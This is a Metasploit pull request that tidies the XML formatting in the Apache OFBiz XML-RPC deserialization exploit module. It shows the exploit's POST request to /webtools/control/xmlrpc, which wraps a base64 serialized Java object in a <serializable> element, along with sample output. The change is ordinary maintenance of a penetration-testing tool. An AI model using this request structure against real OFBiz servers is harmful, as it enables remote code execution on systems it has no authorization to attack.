### PR TITLE
Remove no-op Nokogiri::XML pretty printing in exploit/linux/http/apache_ofbiz_deserialiation

### DIFF
--- a/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb
+++ b/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb
@@ -133,8 +133,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/webtools/control/xmlrpc'),
       'ctype' => 'text/xml',
-      # HACK: Pretty-print XML
-      'data' => Nokogiri::XML(<<~XML, &:noblanks).to_xml
+      'data' => <<~XML
         <?xml version="1.0"?>
         <methodCall>
           <methodName>#{rand_text_alphanumeric(8..42)}</methodName>

--- a/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb
+++ b/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb
@@ -142,7 +142,7 @@ class MetasploitModule < Msf::Exploit::Remote
               <value>
                 <struct>
                   <member>
-                  <name>#{rand_text_alphanumeric(8..42)}</name>
+                    <name>#{rand_text_alphanumeric(8..42)}</name>
                     <value>
                       <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">#{Rex::Text.encode_base64(data)}</serializable>
                     </value>


### PR DESCRIPTION
https://github.com/rapid7/metasploit-framework/commit/ea1f3d60f11fbb7b6ccac0254bbd1ea6219a7b1e, which updates the module's XML formatting, makes the `Nokogiri::XML` pretty-printed output a no-op.

```
[1] pry(#<Msf::Modules::Exploit__Linux__Http__Apache_ofbiz_deserialiation::MetasploitModule>)> puts Nokogiri::XML(<<~XML, &:noblanks).to_xml
[1] pry(#<Msf::Modules::Exploit__Linux__Http__Apache_ofbiz_deserialiation::MetasploitModule>)*   <?xml version="1.0"?>
[1] pry(#<Msf::Modules::Exploit__Linux__Http__Apache_ofbiz_deserialiation::MetasploitModule>)*   <methodCall>
[1] pry(#<Msf::Modules::Exploit__Linux__Http__Apache_ofbiz_deserialiation::MetasploitModule>)*   <methodName>#{rand_text_alphanumeric(8..42)}</methodName>
[1] pry(#<Msf::Modules::Exploit__Linux__Http__Apache_ofbiz_deserialiation::MetasploitModule>)*   <params><param><value><struct><member>
[1] pry(#<Msf::Modules::Exploit__Linux__Http__Apache_ofbiz_deserialiation::MetasploitModule>)*   <name>#{rand_text_alphanumeric(8..42)}</name>
[1] pry(#<Msf::Modules::Exploit__Linux__Http__Apache_ofbiz_deserialiation::MetasploitModule>)*   <value>
[1] pry(#<Msf::Modules::Exploit__Linux__Http__Apache_ofbiz_deserialiation::MetasploitModule>)*   <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions"
[1] pry(#<Msf::Modules::Exploit__Linux__Http__Apache_ofbiz_deserialiation::MetasploitModule>)*   >#{Rex::Text.encode_base64("\xac\xed")}</serializable>
[1] pry(#<Msf::Modules::Exploit__Linux__Http__Apache_ofbiz_deserialiation::MetasploitModule>)*   </value>
[1] pry(#<Msf::Modules::Exploit__Linux__Http__Apache_ofbiz_deserialiation::MetasploitModule>)*   </member></struct></value></param></params>
[1] pry(#<Msf::Modules::Exploit__Linux__Http__Apache_ofbiz_deserialiation::MetasploitModule>)*   </methodCall>
[1] pry(#<Msf::Modules::Exploit__Linux__Http__Apache_ofbiz_deserialiation::MetasploitModule>)* XML
<?xml version="1.0"?>
<methodCall>
  <methodName>PlPh6F6fhtTWInoaEV3exNYeYDWPNS66fD</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>OG5jYLe89miUMgZ97Y73PEAKfhj6Q2amSMrFKeu9RJ</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0=</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>
=> nil
[2] pry(#<Msf::Modules::Exploit__Linux__Http__Apache_ofbiz_deserialiation::MetasploitModule>)>
```

Fixes #14000.